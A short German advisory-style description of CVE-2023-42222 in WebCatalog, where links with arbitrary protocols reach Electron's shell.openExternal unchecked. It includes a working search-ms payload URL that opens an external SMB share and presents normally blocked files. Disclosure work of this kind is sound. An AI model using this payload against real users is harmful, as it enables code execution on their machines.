
Proof-of-concept-Exploit für CVE-2023-42222 in WebCatalog, der die Ausführung beliebiger URLs über Electron's shell.openExternal demonstriert, um Sicherheitsvorkehrungen zu umgehen und Code auszuführen.
WebCatalog vor Version 48.4.0 ruft in bestimmten Fällen die Electron-Funktion shell.openExternal auf, ohne zu überprüfen, ob die URL eine http- oder https-Ressource ist. Diese Schwachstelle ermöglicht es einem Angreifer, Code auf dem Rechner des Opfers auszuführen, indem er Nachrichten mit Links versendet, die beliebige Protokolle enthalten. Das Opfer muss mit dem Link interagieren und sieht die geöffnete URL.


Die Schwachstelle kann bestätigt werden, indem eine Seite synchronisiert wird, die beliebige URLs erlaubt. Wenn eine Website synchronisiert wird, die search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools enthält, wird eine externe SMB-Verbindung hergestellt. Diese kann dann verwendet werden, um Sicherheitsvorkehrungen auf dem lokalen Rechner zu umgehen und dem Benutzer schädliche Dateien zu präsentieren, die normalerweise blockiert würden.